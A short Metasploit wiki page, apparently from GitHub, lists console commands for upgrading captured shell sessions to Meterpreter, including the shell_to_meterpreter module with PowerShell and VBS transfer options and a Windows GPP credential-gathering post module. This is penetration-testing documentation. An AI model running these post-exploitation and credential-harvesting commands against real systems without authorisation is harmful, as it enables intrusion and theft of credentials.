-
Notifications
You must be signed in to change notification settings - Fork 14.2k
Metasploit Guide Upgrading Shells to Meterpreter
adfoster-r7 edited this page Apr 21, 2022
·
4 revisions
To upgrade a specific session to Meterpreter:
sessions -u 3
To upgrade the most recently opened session to Meterpreter using the sessions
command:
sessions -u -1
Or run the shell_to_meterpreter
module manually:
use multi/manage/shell_to_meterpreter
run session=-1
run session=-1 win_transfer=POWERSHELL
run session=-1 win_transfer=VBS
Providing inline options also works for post modules:
use auxiliary/windows/gather/credentials/gpp
run session=-1
- Home Welcome to Metasploit!
- Using Metasploit A collection of useful links for penetration testers.
-
Setting Up a Metasploit Development Environment From
apt-get install
togit push
. - CONTRIBUTING.md What should your contributions look like?
- Landing Pull Requests Working with other people's contributions.
- Using Git All about Git and GitHub.
- Contributing to Metasploit Be a part of our open source community.
- Meterpreter All about the Meterpreter payload.